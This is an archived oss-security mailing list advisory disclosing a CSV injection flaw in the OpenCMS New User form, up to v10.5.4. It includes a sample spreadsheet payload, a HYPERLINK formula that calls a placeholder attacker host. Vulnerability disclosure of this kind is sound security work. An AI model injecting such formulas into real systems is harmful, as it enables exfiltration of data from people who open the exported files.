'[oss-security] CSV Injection | Alkacon OpenCMS v10.5.4 and before'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] CSV Injection | Alkacon OpenCMS v10.5.4 and before
From:       Pramod Rana <varchashva () gmail ! com>
Date:       2019-05-05 10:12:22
Message-ID: CALv8orHZc+_tuwny9g9JGQzX1VBES3L1OYjmdwNzeZNeRWAhJw () mail ! gmail ! com
[Download RAW message or body]

Description
 - OpenCMS v10.5.4 and before is vulnerable to CSV injection in New
User module for parameter First Name and Last Name
 - Impacted URL is
http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp
 - Payload used is
'=HYPERLINK("http://[attacker_ip:port]/GiveMeSomeData","IAmSafe")'

Further details
 - https://github.com/alkacon/opencms-core/issues/636

Already requested for CVE, yet to receive it.
[prev in list] [next in list] [prev in thread] [next in thread]

Configure | About | News | Add a list | Sponsored by KoreLogic